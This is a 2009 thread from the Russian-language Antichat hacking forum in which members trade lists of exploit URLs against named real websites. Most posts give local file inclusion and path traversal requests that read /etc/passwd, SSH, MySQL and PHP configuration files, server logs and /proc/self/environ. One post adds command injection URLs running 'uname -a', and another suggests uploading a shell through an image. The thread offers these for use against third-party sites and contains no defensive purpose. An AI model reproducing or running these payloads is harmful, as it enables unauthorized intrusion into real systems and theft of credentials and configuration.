HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.06.2009, 22:59
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Smile



PR3
Код:
http://www.galileo-tv.ru/inner.php?page=[LFI]
Можно через картинку залить shell
 
Ответить с цитированием

  #2  
Старый 21.06.2009, 04:16
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

Немножко инъекций и читалок, включая слепые, скорее всего многого не было, т.к. пока не видел еще сканеров, когда ошибки не выводятся:

Код:
http://www.pudasjarvi.fi/deutsch/index.php?file=/etc/passwd
http://www.pudasjarvi.fi/deutsch/index.php?file=/usr/local/apache/logs/access_log
http://www.pudasjarvi.fi/deutsch/index.php?file=/usr/local/apache/logs/error_log
----------------------------
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/ssh/sshd_config
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/mysql/my.cnf
-----------------------------
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/passwd
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/my.cnf
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../usr/bin/grep

-----------------------------
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/passwd
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/apache2/httpd.conf
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/mysql/my.cnf
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/proftpd/modules.conf

-----------------------------
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/passwd
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/apache2/httpd.conf
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/mysql/my.cnf
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/proftpd/modules.conf

-----------------------------
http://www.bird.org.tw/index.php?block=../../../../etc/passwd
http://www.bird.org.tw/index.php?block=../../../../etc/ssh/sshd_config
-----------------------------
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/passwd
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/ssh/sshd_config
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/mysql/my.cnf
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/proftpd/modules.conf
-----------------------------
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/passwd
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/ssh/sshd_config
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/php.ini
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/my.cnf
-----------------------------
http://www.tonie.net/index.php?p=../../../../../../../etc/passwd
http://www.tonie.net/index.php?p=../../../../../../../etc/ssh/sshd_config
http://www.tonie.net/index.php?p=../../../../../../../etc/apache2/httpd.conf
http://www.tonie.net/index.php?p=../../../../../../../etc/mysql/my.cnf
http://www.tonie.net/index.php?p=../../../../../../../etc/vsftpd.conf
------------------------------
-----------------------------
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/ssh/sshd_config
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/php/php.ini
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../usr/bin/grep
-----------------------------
http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../etc/passwd
http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../proc/self/environ
http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../etc/ssh/sshd_config
-----------------------------
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/passwd
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../proc/self/environ
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/httpd/conf/httpd.conf
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../usr/local/etc/php.ini
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/my.cnf
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/logrotate.d/vsftpd.log
-----------------------------
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../etc/passwd
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/logs/access_log
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/logs/error_log
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/conf/httpd.conf
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/etc/httpd/conf/httpd.conf
-------------------------------
http://www.toshin.com/cgi-bin/news/headline/view.cgi?File=|uname%20-a|
http://shimizu.dyndns.tv/simizu-t/cgi-bin/link.cgi?file=|uname%20-a|
http://f22.aaa.livedoor.jp/~gbwars/cgi-bin/gbw/turn/chdata.cgi?file=|uname%20-a|
http://www.nurs.or.jp/~siizuka/cgi-bin/download.cgi?file=|uname$IFS-a|
-----------------------------
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/passwd
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../proc/self/environ
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/apache2/httpd.conf
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/php5/apache2/php.ini
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../usr/bin/grep
-----------------------------
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/passwd
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../proc/self/environ
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/ssh/sshd_config
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/php5/apache2/php.ini
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/php5/cgi/php.ini
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/mysql/my.cnf
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/proftpd/modules.conf
 
Ответить с цитированием

  #3  
Старый 21.06.2009, 13:49
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

Код:
-----------------------------
http://www.soccer7.org/show.pl?file=../../../../../../../../../etc/passwd
http://www.soccer7.org/show.pl?file=../../../../../../../../../proc/self/environ
http://www.soccer7.org/show.pl?file=../../../../../../../../../var/log/httpd/access_log
http://www.soccer7.org/show.pl?file=../../../../../../../../../var/log/httpd/error_log
http://www.soccer7.org/show.pl?file=../../../../../../../../../usr/local/apache/conf/httpd.conf
http://www.soccer7.org/show.pl?file=../../../../../../../../../etc/php.ini
http://www.soccer7.org/show.pl?file=../../../../../../../../../etc/my.cnf
http://www.soccer7.org/show.pl?file=../../../../../../../../../var/log/maillog
-----------------------------
http://www.acomputerguy.org/index.php?file=../../../../../../../../../etc/passwd
http://www.acomputerguy.org/index.php?file=../../../../../../../../../etc/ssh/sshd_config
http://www.acomputerguy.org/index.php?file=../../../../../../../../../var/log/httpd/access.log
http://www.acomputerguy.org/index.php?file=../../../../../../../../../usr/local/apache/conf/httpd.conf
http://www.acomputerguy.org/index.php?file=../../../../../../../../../usr/local/etc/php.ini
 
Ответить с цитированием

  #4  
Старый 25.06.2009, 14:41
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/passwd
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/ssh/sshd_config
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../usr/local/etc/php.ini
http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/my.cnf
----

http://tequilajazzz.com/zzz.php?zzz=zzz.php%00

---

http://valganoored.leadmaster.pri.ee/?id=index.php%00

---

http://radomiak.info/index.php?id=index.php%00

---

http://www.classic-appraisals.com/?id=index.php

Последний раз редактировалось AlexSatter; 26.06.2009 в 12:11..
 
Ответить с цитированием

  #5  
Старый 26.06.2009, 15:18
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

Код:
http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../etc/passwd&top=self&bottom=self
http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../etc/ssh/sshd_config&top=self&bottom=self
http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../usr/local/etc/php.ini&top=self&bottom=self
http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../etc/my.cnf&top=self&bottom=self
------------------------------
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/passwd&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../proc/self/environ&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/ssh/sshd_config&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/httpd/conf/httpd.conf&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/php.ini&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/my.cnf&lang=german&source=index&title=Netboot-Spezifikation
-----------------------------
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/passwd%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../proc/self/environ%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/ssh/sshd_config%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/httpd/conf/httpd.conf%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/php.ini%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/my.cnf%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../var/log/maillog%00
-----------------------------
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/passwd%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../proc/self/environ%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/httpd/conf/httpd.conf%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/php.ini%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/my.cnf%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/logrotate.d/vsftpd.log%00
-----------------------------
http://www.bailii.org/cgi-bin/markup.cgi?doc=../../../../../etc/passwd
http://www.bailii.org/cgi-bin/markup.cgi?doc=../../../../../proc/self/environ
 
Ответить с цитированием

  #6  
Старый 06.07.2009, 23:43
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
По умолчанию

[PR 6]
Код:
http://web.ce.metu.edu.tr/index.php?id=../../../index
[PR 6]
Код:
http://www.ipp.mesi.ru/edu/index.php?id=index
 
Ответить с цитированием

  #7  
Старый 08.07.2009, 21:44
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

Код:
http://www.motormania.hr/index.php?forwardUrl=../../../../../etc/passwd
 
Ответить с цитированием

  #8  
Старый 09.07.2009, 23:59
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://www.jlc-software.com/?page=../../../../etc/passwd

Safe mode
 
Ответить с цитированием

  #9  
Старый 11.07.2009, 20:08
schwarze
Познающий
Регистрация: 01.12.2008
Сообщений: 68
Провел на форуме:
484662

Репутация: 143
По умолчанию

Код:
http://www.mumost.cz/informace/index.htm?fr2=../../../
и тд и тп)
 
Ответить с цитированием

  #10  
Старый 12.07.2009, 23:54
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
По умолчанию

[PR 6]
Код:
http://www.piedmont.edu/index.php?id=../index.php%00
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.